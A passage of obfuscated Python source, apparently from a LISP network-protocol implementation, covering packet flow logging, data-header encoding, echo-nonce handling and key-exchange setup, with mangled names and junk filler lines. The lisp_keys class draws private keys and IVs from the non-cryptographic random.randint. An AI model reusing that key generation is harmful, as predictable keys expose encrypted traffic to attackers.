i1i111III1 = bold ( "SO_BINDTODEVICE" , False )
I11iI11i1i1 = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( i1i111III1 , "drop" if I11iI11i1i1 else "forward" ) )
if 7 - 7: iII111i
if ( I11iI11i1i1 ) : return ( None )
if 18 - 18: OoOoOO00
if 77 - 77: I1Ii111 . i11iIiiIii / Ii1I * i11iIiiIii - o0oOOo0O0Ooo
oooo = bold ( oooo , False )
IiI11I111 = bold ( i111IIiIiiI1 . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( oooo , IiI11I111 ) )
return ( I111 )
if 6 - 6: i11iIiiIii
if 16 - 16: IiII
def log_flow ( self , encap ) :
global lisp_flow_log
if 84 - 84: i1IIi / iIii1I11I1II1 / oO0o / Ii1I
iIOOOO00 = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or iIOOOO00 ) :
I11IIII1iI = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = I11IIII1iI ) . start ( )
if ( iIOOOO00 ) : os . system ( "rm ./log-flows" )
return
if 37 - 37: OoO0O00 - Oo0Ooo
if 38 - 38: i11iIiiIii / OoO0O00
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
if 64 - 64: IiII
if 80 - 80: I1IiiI - i11iIiiIii / OoO0O00 / OoOoOO00 + OoOoOO00
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
oo000o = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 6 - 6: OOooOOo + I1ii11iIi11i + Oo0Ooo
o0OOo0o0o0ooo = red ( self . outer_source . print_address_no_iid ( ) , False )
o0OOoo = red ( self . outer_dest . print_address_no_iid ( ) , False )
oO0o00O = green ( self . inner_source . print_address ( ) , False )
IIII1ii1iIIii = green ( self . inner_dest . print_address ( ) , False )
if 96 - 96: OoO0O00 - iII111i
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
oo000o += " {}:{} -> {}:{}, LISP control message type {}\n"
oo000o = oo000o . format ( o0OOo0o0o0ooo , self . udp_sport , o0OOoo , self . udp_dport ,
self . inner_version )
return ( oo000o )
if 16 - 16: I1Ii111 / O0 . II111iiii * OoOoOO00
if 7 - 7: I1Ii111 * O0 + OoOoOO00
if ( self . outer_dest . is_null ( ) == False ) :
oo000o += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
oo000o = oo000o . format ( o0OOo0o0o0ooo , self . udp_sport , o0OOoo , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 90 - 90: IiII * II111iiii * IiII - iII111i
if 34 - 34: OOooOOo - I1ii11iIi11i * iII111i % Ii1I
if 25 - 25: II111iiii + I1IiiI * ooOoO0o * I1ii11iIi11i . iII111i
if 26 - 26: iII111i - ooOoO0o / OoooooooOO + o0oOOo0O0Ooo . Oo0Ooo
if 75 - 75: O0 / OoOoOO00 . I1Ii111
if ( self . lisp_header . k_bits != 0 ) :
iI1iIi1ii1I1 = "\n"
if ( self . packet_error != "" ) :
iI1iIi1ii1I1 = " ({})" . format ( self . packet_error ) + iI1iIi1ii1I1
if 59 - 59: II111iiii * OoooooooOO - OoooooooOO
oo000o += ", encrypted" + iI1iIi1ii1I1
return ( oo000o )
if 33 - 33: O0 . i11iIiiIii % o0oOOo0O0Ooo
if 50 - 50: ooOoO0o
if 81 - 81: i11iIiiIii * iIii1I11I1II1 / Oo0Ooo * OOooOOo
if 83 - 83: i11iIiiIii - I1IiiI * i11iIiiIii
if 59 - 59: iII111i - OoooooooOO / ooOoO0o + I1ii11iIi11i . o0oOOo0O0Ooo - iII111i
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 29 - 29: oO0o
if 26 - 26: O0 % OOooOOo - IiII . OOooOOo
oo0 = packet [ 9 : 10 ] if self . inner_version == 4 else packet [ 6 : 7 ]
oo0 = struct . unpack ( "B" , oo0 ) [ 0 ]
if 70 - 70: o0oOOo0O0Ooo + I11i / iII111i + ooOoO0o / I1IiiI
oo000o += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
oo000o = oo000o . format ( oO0o00O , IIII1ii1iIIii , len ( packet ) , self . inner_tos ,
self . inner_ttl , oo0 )
if 33 - 33: OoooooooOO . O0
if 59 - 59: iIii1I11I1II1
if 45 - 45: O0
if 78 - 78: I11i - iIii1I11I1II1 + I1Ii111 - I1ii11iIi11i - I1Ii111
if ( oo0 in [ 6 , 17 ] ) :
iii1 = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( iii1 ) == 4 ) :
iii1 = socket . ntohl ( struct . unpack ( "I" , iii1 ) [ 0 ] )
oo000o += ", ports {} -> {}" . format ( iii1 >> 16 , iii1 & 0xffff )
if 26 - 26: OOooOOo + Oo0Ooo
elif ( oo0 == 1 ) :
oo0iI1i11II1i1i = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( oo0iI1i11II1i1i ) == 2 ) :
oo0iI1i11II1i1i = socket . ntohs ( struct . unpack ( "H" , oo0iI1i11II1i1i ) [ 0 ] )
oo000o += ", icmp-seq {}" . format ( oo0iI1i11II1i1i )
if 61 - 61: I11i * Ii1I + I11i - Oo0Ooo % OoOoOO00 . iII111i
if 51 - 51: OOooOOo / I11i
if ( self . packet_error != "" ) :
oo000o += " ({})" . format ( self . packet_error )
if 51 - 51: ooOoO0o * oO0o - I1Ii111 + iII111i
oo000o += "\n"
return ( oo000o )
if 46 - 46: o0oOOo0O0Ooo - i11iIiiIii % OoO0O00 / Ii1I - OoOoOO00
if 88 - 88: oO0o * I1IiiI / OoO0O00 - OOooOOo / i1IIi . I1Ii111
def is_trace ( self ) :
iii1 = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in iii1 )
if 26 - 26: i11iIiiIii - ooOoO0o
if 45 - 45: ooOoO0o + II111iiii % iII111i
if 55 - 55: ooOoO0o - oO0o % I1IiiI
if 61 - 61: ooOoO0o
if 22 - 22: iIii1I11I1II1 / ooOoO0o / I1IiiI - o0oOOo0O0Ooo
if 21 - 21: oO0o . i11iIiiIii * I11i . OOooOOo / OOooOOo
if 42 - 42: OoooooooOO / I1Ii111 . o0oOOo0O0Ooo / O0 - IiII * IiII
if 1 - 1: Ii1I % I1Ii111
if 97 - 97: OoOoOO00
if 13 - 13: OoOoOO00 % OOooOOo . O0 / Oo0Ooo % Oo0Ooo
if 19 - 19: I1Ii111 % ooOoO0o - ooOoO0o % I1IiiI . OOooOOo - OoooooooOO
if 100 - 100: I1IiiI + Ii1I + o0oOOo0O0Ooo . i1IIi % OoooooooOO
if 64 - 64: O0 % i1IIi * I1Ii111 - Ii1I + Oo0Ooo
if 65 - 65: OoOoOO00 . i11iIiiIii
if 36 - 36: oO0o * iII111i + IiII * iII111i . I1ii11iIi11i - iIii1I11I1II1
if 14 - 14: I11i * oO0o + i11iIiiIii
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 84 - 84: iII111i / II111iiii
class lisp_data_header ( object ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 86 - 86: I1IiiI
if 97 - 97: II111iiii
def print_header ( self , e_or_d ) :
iIiIii = lisp_hex_string ( self . first_long & 0xffffff )
ii111I1IiiI1i = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 22 - 22: II111iiii / I1ii11iIi11i * IiII - o0oOOo0O0Ooo % I1ii11iIi11i
IiiiI1 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 70 - 70: II111iiii - IiII
return ( IiiiI1 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
iIiIii , ii111I1IiiI1i ) )
if 76 - 76: I1Ii111
if 43 - 43: O0 / I1Ii111 . iIii1I11I1II1 - OoOoOO00
def encode ( self ) :
iiII1iiI = "II"
iIiIii = socket . htonl ( self . first_long )
ii111I1IiiI1i = socket . htonl ( self . second_long )
if 57 - 57: i11iIiiIii - I11i / ooOoO0o / o0oOOo0O0Ooo * i11iIiiIii * o0oOOo0O0Ooo
IiIii1iIIII = struct . pack ( iiII1iiI , iIiIii , ii111I1IiiI1i )
return ( IiIii1iIIII )
if 92 - 92: IiII / iIii1I11I1II1
if 43 - 43: ooOoO0o + OoooooooOO + iIii1I11I1II1 / OoooooooOO
def decode ( self , packet ) :
iiII1iiI = "II"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
if 58 - 58: iII111i % iIii1I11I1II1 . iIii1I11I1II1 / I11i
iIiIii , ii111I1IiiI1i = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 79 - 79: OoO0O00 / OOooOOo - i1IIi + i1IIi - IiII + IiII
if 67 - 67: OoO0O00 * OoO0O00 / OoooooooOO
self . first_long = socket . ntohl ( iIiIii )
self . second_long = socket . ntohl ( ii111I1IiiI1i )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 79 - 79: o0oOOo0O0Ooo % iIii1I11I1II1 / II111iiii / Ii1I / Ii1I + O0
if 46 - 46: i1IIi / IiII
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 84 - 84: OoOoOO00 / iIii1I11I1II1 + oO0o % ooOoO0o + oO0o - iIii1I11I1II1
if 27 - 27: O0 / o0oOOo0O0Ooo * I1IiiI
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 41 - 41: ooOoO0o
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
if 1 - 1: I1IiiI . Ii1I
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
if 33 - 33: Ii1I + OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 % i1IIi * IiII
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
if 21 - 21: O0 * ooOoO0o % OoO0O00
if 14 - 14: O0 / I1Ii111 / ooOoO0o + IiII - IiII
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 10 - 10: O0 - I1ii11iIi11i / I1Ii111 % OoOoOO00 / OoooooooOO / Ii1I
if 73 - 73: ooOoO0o + IiII % o0oOOo0O0Ooo . I1ii11iIi11i / OOooOOo . I1Ii111
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 76 - 76: I11i . I1ii11iIi11i * OoooooooOO % iII111i
if 24 - 24: OoooooooOO
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 83 - 83: O0 / OoO0O00
if 62 - 62: I11i
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 73 - 73: Ii1I % OoO0O00 * OOooOOo
if 84 - 84: Oo0Ooo
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 18 - 18: OoooooooOO
if 85 - 85: OoooooooOO . OoO0O00 . OoO0O00
if 70 - 70: I11i
class lisp_echo_nonce ( object ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 72 - 72: I1Ii111 - ooOoO0o - I1IiiI - iII111i + OOooOOo - i1IIi
if 45 - 45: OoO0O00 * I1IiiI
def send_ipc ( self , ipc_socket , ipc ) :
O0oo0OoO0oo = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
IIi11ii = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , O0oo0OoO0oo )
lisp_ipc ( ipc , ipc_socket , IIi11ii )
if 74 - 74: I1ii11iIi11i * oO0o + iII111i % O0
if 18 - 18: i1IIi % IiII . O0 - O0 - O0 - II111iiii
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
OO = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , OO )
if 84 - 84: Ii1I
if 70 - 70: iIii1I11I1II1
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
OO = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , OO )
if 45 - 45: O0 - OoOoOO00 % OOooOOo
if 100 - 100: i11iIiiIii . OOooOOo . i11iIiiIii
def receive_request ( self , ipc_socket , nonce ) :
o00Oo = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( o00Oo != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 20 - 20: Ii1I . Oo0Ooo - I11i % I11i - I1IiiI * OOooOOo
if 80 - 80: II111iiii / o0oOOo0O0Ooo . OOooOOo . o0oOOo0O0Ooo
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 29 - 29: OoooooooOO % II111iiii % i11iIiiIii - Oo0Ooo
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 5 - 5: I1ii11iIi11i . II111iiii . i1IIi
if 35 - 35: o0oOOo0O0Ooo + OoO0O00 - I1ii11iIi11i
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 24 - 24: II111iiii
if 23 - 23: Oo0Ooo - iII111i
if 79 - 79: I11i . O0 - i1IIi
if 42 - 42: oO0o - i11iIiiIii % oO0o - I1Ii111 * O0 / II111iiii
if 5 - 5: Oo0Ooo
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
oOoOo0o0 = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 50 - 50: Oo0Ooo - o0oOOo0O0Ooo % II111iiii . O0 . oO0o % II111iiii
if 18 - 18: I11i % OoooooooOO + OoO0O00 / I11i
if ( remote_rloc . address > oOoOo0o0 . address ) :
OO0O00o0 = "exit"
self . request_nonce_sent = None
else :
OO0O00o0 = "stay in"
self . echo_nonce_sent = None
if 37 - 37: i1IIi - Ii1I / IiII . II111iiii % ooOoO0o
if 39 - 39: Ii1I % i11iIiiIii * OoO0O00
I1i11i = bold ( "collision" , False )
oOO0O00o0O0 = red ( oOoOo0o0 . print_address_no_iid ( ) , False )
iiiI1I = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( I1i11i ,
oOO0O00o0O0 , iiiI1I , OO0O00o0 ) )
if 92 - 92: Oo0Ooo % o0oOOo0O0Ooo - ooOoO0o / ooOoO0o / OoOoOO00
if 84 - 84: OOooOOo
if 4 - 4: IiII . I1Ii111 / Ii1I / iII111i + II111iiii
if 32 - 32: i1IIi + iIii1I11I1II1 . I1ii11iIi11i . I11i - Ii1I
if 55 - 55: I1ii11iIi11i / OoooooooOO - OoO0O00 / I1IiiI
if ( self . echo_nonce_sent != None ) :
o0Oo0o = self . echo_nonce_sent
oO0ooOOO = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( oO0ooOOO ,
lisp_hex_string ( o0Oo0o ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( o0Oo0o )
if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
if 41 - 41: IiII * OoooooooOO . ooOoO0o % i11iIiiIii
if 11 - 11: iIii1I11I1II1 . I1Ii111 - Oo0Ooo / I11i + II111iiii
if 29 - 29: I11i . i11iIiiIii + i1IIi - Ii1I + O0 . I1IiiI
if 8 - 8: o0oOOo0O0Ooo
if 78 - 78: i1IIi - Oo0Ooo
if 48 - 48: Ii1I - OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
o0Oo0o = self . request_nonce_sent
i11iII11I1III = self . last_request_nonce_sent
if ( o0Oo0o and i11iII11I1III != None ) :
if ( time . time ( ) - i11iII11I1III >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0Oo0o ) ) )
if 44 - 44: OOooOOo . iIii1I11I1II1 . i11iIiiIii % OoooooooOO . ooOoO0o
return ( None )
if 53 - 53: IiII + O0
if 88 - 88: OoooooooOO
if 46 - 46: O0 % OoooooooOO
if 22 - 22: iII111i + OoooooooOO - OoOoOO00 - OoO0O00 * I1Ii111 - oO0o
if 99 - 99: ooOoO0o / I1IiiI . Ii1I - Ii1I * I1IiiI
if 24 - 24: I11i * OoO0O00 - oO0o / iIii1I11I1II1 - Oo0Ooo . OOooOOo
if 2 - 2: ooOoO0o - O0 - I1ii11iIi11i / I11i * OoOoOO00
if 26 - 26: I1ii11iIi11i + I1Ii111 - oO0o + IiII % OOooOOo
if 84 - 84: I11i % Ii1I % O0 * o0oOOo0O0Ooo
if ( o0Oo0o == None ) :
o0Oo0o = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( o0Oo0o )
if 15 - 15: oO0o - iIii1I11I1II1 - II111iiii - IiII % I1ii11iIi11i
self . request_nonce_sent = o0Oo0o
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0Oo0o ) ) )
if 80 - 80: IiII * iII111i . i1IIi % Ii1I % I1ii11iIi11i + ooOoO0o
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 6 - 6: I1ii11iIi11i . oO0o . OoO0O00 + IiII
if 65 - 65: I1ii11iIi11i / ooOoO0o
if 23 - 23: OOooOOo / OOooOOo * o0oOOo0O0Ooo * OOooOOo
if 57 - 57: iII111i
if 29 - 29: I1IiiI
if ( lisp_i_am_itr == False ) : return ( o0Oo0o | 0x80000000 )
self . send_request_ipc ( ipc_socket , o0Oo0o )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( o0Oo0o ) ) )
if 41 - 41: I1Ii111 * OoO0O00 - iII111i . Ii1I
if 41 - 41: iIii1I11I1II1 - O0 - I1ii11iIi11i - oO0o + I1Ii111
if 22 - 22: O0 % IiII % iII111i % I1IiiI
if 34 - 34: iII111i . Oo0Ooo % I1ii11iIi11i . iII111i % IiII / IiII
if 84 - 84: Ii1I
if 1 - 1: oO0o - Oo0Ooo * iIii1I11I1II1 * Oo0Ooo * i1IIi
if 9 - 9: iII111i - iII111i
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( o0Oo0o | 0x80000000 )
if 3 - 3: O0 + O0 - O0 - O0 % OoooooooOO + oO0o
if 20 - 20: OoO0O00 + I11i . II111iiii / i11iIiiIii
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 50 - 50: OoooooooOO / OoO0O00 % iIii1I11I1II1
i1i111Iiiiiii = time . time ( ) - self . last_request_nonce_sent
IIIIi11111 = self . last_echo_nonce_rcvd
return ( i1i111Iiiiiii >= LISP_NONCE_ECHO_INTERVAL and IIIIi11111 == None )
if 99 - 99: O0 * i11iIiiIii % OOooOOo * II111iiii
if 98 - 98: O0 + iIii1I11I1II1
def recently_requested ( self ) :
IIIIi11111 = self . last_request_nonce_sent
if ( IIIIi11111 == None ) : return ( False )
if 94 - 94: i1IIi * OoO0O00 * OoOoOO00
i1i111Iiiiiii = time . time ( ) - IIIIi11111
return ( i1i111Iiiiiii <= LISP_NONCE_ECHO_INTERVAL )
if 93 - 93: ooOoO0o / OOooOOo * O0
if 17 - 17: OoO0O00 / ooOoO0o % I1IiiI
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 47 - 47: Oo0Ooo * OoO0O00 / o0oOOo0O0Ooo * I1IiiI
if 60 - 60: I1ii11iIi11i / IiII . i11iIiiIii / OoO0O00 % II111iiii
if 6 - 6: iII111i % o0oOOo0O0Ooo + I1Ii111
if 91 - 91: o0oOOo0O0Ooo + O0 * oO0o * IiII * I1ii11iIi11i
IIIIi11111 = self . last_good_echo_nonce_rcvd
if ( IIIIi11111 == None ) : IIIIi11111 = 0
i1i111Iiiiiii = time . time ( ) - IIIIi11111
if ( i1i111Iiiiiii <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 83 - 83: OoooooooOO
if 52 - 52: o0oOOo0O0Ooo / OoOoOO00 % oO0o % OoO0O00 / IiII % o0oOOo0O0Ooo
if 88 - 88: OOooOOo / i11iIiiIii / Ii1I / i11iIiiIii * I1ii11iIi11i % I11i
if 43 - 43: OoOoOO00 * OoO0O00 % i1IIi * Ii1I + iIii1I11I1II1
if 80 - 80: o0oOOo0O0Ooo . iII111i . OoooooooOO
if 63 - 63: ooOoO0o . OOooOOo
IIIIi11111 = self . last_new_request_nonce_sent
if ( IIIIi11111 == None ) : IIIIi11111 = 0
i1i111Iiiiiii = time . time ( ) - IIIIi11111
return ( i1i111Iiiiiii <= LISP_NONCE_ECHO_INTERVAL )
if 66 - 66: I1IiiI
if 99 - 99: OoO0O00 % O0 . I1Ii111 - I1ii11iIi11i . Oo0Ooo / OoOoOO00
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
o0oOOoOoo = bold ( "down" , False )
ooO0O = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , o0oOOoOoo , ooO0O ) )
if 55 - 55: OOooOOo - II111iiii - IiII . I11i + oO0o - oO0o
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 29 - 29: OoOoOO00 - I1Ii111 % OOooOOo
if 45 - 45: IiII / Oo0Ooo + OoooooooOO
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 77 - 77: oO0o . Ii1I / O0 * oO0o
if ( self . recently_requested ( ) == False ) :
oOoO0O0o = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , oOoO0O0o ) )
if 84 - 84: OoOoOO00 - I11i
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 80 - 80: i11iIiiIii % OOooOOo - Oo0Ooo % OOooOOo
if 89 - 89: Ii1I * I11i + OoOoOO00 / i11iIiiIii
if 68 - 68: OoooooooOO * I11i
def print_echo_nonce ( self ) :
oOOO = lisp_print_elapsed ( self . last_request_nonce_sent )
Iii111111 = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 23 - 23: I1Ii111 - iIii1I11I1II1 - II111iiii + I1Ii111 % Ii1I / I11i
oO0o0o0OO0o00 = lisp_print_elapsed ( self . last_echo_nonce_sent )
IiII11 = lisp_print_elapsed ( self . last_request_nonce_rcvd )
I111 = space ( 4 )
if 56 - 56: I1IiiI
oOo0OOoooO = "Nonce-Echoing:\n"
oOo0OOoooO += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( I111 , oOOO , I111 , Iii111111 )
if 49 - 49: i1IIi % oO0o / OOooOOo . I1ii11iIi11i - I1Ii111
oOo0OOoooO += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( I111 , IiII11 , I111 , oO0o0o0OO0o00 )
if 12 - 12: i11iIiiIii + I11i - I1ii11iIi11i
if 27 - 27: iII111i
return ( oOo0OOoooO )
if 22 - 22: OoOoOO00 / I1IiiI
if 33 - 33: I11i
if 37 - 37: OoOoOO00 % o0oOOo0O0Ooo * OoO0O00 / i11iIiiIii * II111iiii * iII111i
if 70 - 70: ooOoO0o . i11iIiiIii % OoOoOO00 + oO0o
if 95 - 95: I1ii11iIi11i
if 48 - 48: I11i
if 14 - 14: iIii1I11I1II1 / o0oOOo0O0Ooo * IiII
if 35 - 35: iIii1I11I1II1
if 34 - 34: OoO0O00 % I1IiiI . o0oOOo0O0Ooo % OoO0O00 % OoO0O00
class lisp_keys ( object ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 30 - 30: I1IiiI + I1IiiI
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
III = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( III . encode ( ) )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 75 - 75: I1IiiI - ooOoO0o - I1IiiI % oO0o % OoooooooOO
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 13 - 13: ooOoO0o * OoO0O00 % iIii1I11I1II1 / IiII * iII111i . Oo0Ooo
if 23 - 23: ooOoO0o / IiII . iII111i * Ii1I
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 87 - 87: i11iIiiIii
if 34 - 34: i1IIi
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 64 - 64: iIii1I11I1II1 / IiII / Oo0Ooo - I1ii11iIi11i
OoOooO = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
OoOooO = struct . pack ( "Q" , OoOooO & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
o00oOOO = struct . pack ( "I" , ( OoOooO >> 64 ) & LISP_4_32_MASK )
OoOOOo0 = struct . pack ( "Q" , OoOooO & LISP_8_64_MASK )
OoOooO = o00oOOO + OoOOOo0
else :
OoOooO = struct . pack ( "QQ" , OoOooO >> 64 , OoOooO & LISP_8_64_MASK )
return ( OoOooO )
if 53 - 53: o0oOOo0O0Ooo / I11i % O0 / iIii1I11I1II1 / iII111i
if 1 - 1: Oo0Ooo . i11iIiiIii
def key_length ( self , key ) :
if ( isinstance ( key , int ) ) : key = self . normalize_pub_key ( key )
return ( old_div ( len ( key ) , 2 ) )
if 9 - 9: OoooooooOO / I11i
if 47 - 47: OoooooooOO
def print_key ( self , key ) :
o00oOOo0Oo = self . normalize_pub_key ( key )
II1 = o00oOOo0Oo [ 0 : 4 ] . decode ( )
o0OOO = o00oOOo0Oo [ - 4 : : ] . decode ( )
return ( "0x{}...{}({})" . format ( II1 , o0OOO , self . key_length ( o00oOOo0Oo ) ) )
if 38 - 38: I1IiiI * o0oOOo0O0Ooo - OOooOOo % IiII + I11i - Oo0Ooo
if 55 - 55: iIii1I11I1II1 + OoOoOO00
def normalize_pub_key ( self , key ) :
if ( isinstance ( key , int ) ) :
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
